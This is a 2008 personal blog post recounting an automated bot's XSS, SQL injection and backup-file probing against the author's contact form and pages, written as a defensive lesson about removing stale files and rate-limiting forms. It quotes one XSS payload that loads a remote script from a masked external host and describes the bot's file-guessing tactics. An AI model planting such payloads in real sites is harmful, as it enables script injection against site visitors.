On the 4th of September just before noon (two hours before writing this) my BlackBerry received an email, nothing particularly unusual. Just before I got to check it, I got another and another and this kept on going. Great I thought, probably spam emails that slipped through.

Not quite, on my website I have a contact form that emails me when submitted. So anyway the message being sent to me contained various different random messages that appeared to be a collection of XSS and SQL injection attempts. For example “<ScRiPt src=http://xxx.xxx.xxx/xss.js?32796,5990834475></ScRiPt>” and various others trying to insert images, css, SQL, js, flash HTML headers and so on.

Fortunately for me they were kind enough to do this on my contact form and send me emails basically saying “Hey, check out what I’m trying to do”. Of course, this was a (fairly dumb) robot trying a brute force attack; however it amused me slightly because I probably wouldn’t have noticed otherwise for a few days (until I happened to look at logs).

The Robot tried a huge number of combinations, 5640 unique requests were made to the server. It’s efforts were based on a lot of guess work around what pages it found, for example after going to portfolio.php it tried ‘portfolio.php.bak’, ‘portfolio.php.old’ and various others. It also tried various GET and POST combinations on many of the pages and guessed file names like password.txt (I hope nobody actually has a file like that!).

The IP address I received these requests from was 78.158.151.212 so you may wish to add it to your block list. Looking up the IP address says it is based in Cyprus, but that’s doesn’t really tell me anything helpful.

The attacks only stopped after I blocked the IP, the apache log showed thousands of entries for the following minutes showing it didn’t give up quickly. Fortunately for me the attacks failed and the only annoyance was the 466 emails(!) I received. It is quite interesting to be at the end of an attempt and highlights exactly how some exploits must be found. So make sure you take security seriously and don’t leave old files lying around like .bak or .old! You might think nobody will find them, but maybe this robot will visit you too.

I had thought about adding a limit to the number of contact form submissions. Say five per minute (still far more than anybody needs), however it was something I shrugged off. I guess I should have listened to my original instincts and I’ll just add it in now…

This entry was posted on Thursday, September 4th, 2008 at 1:31 pm and is filed under Random, Security, Server Technology, Site News. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.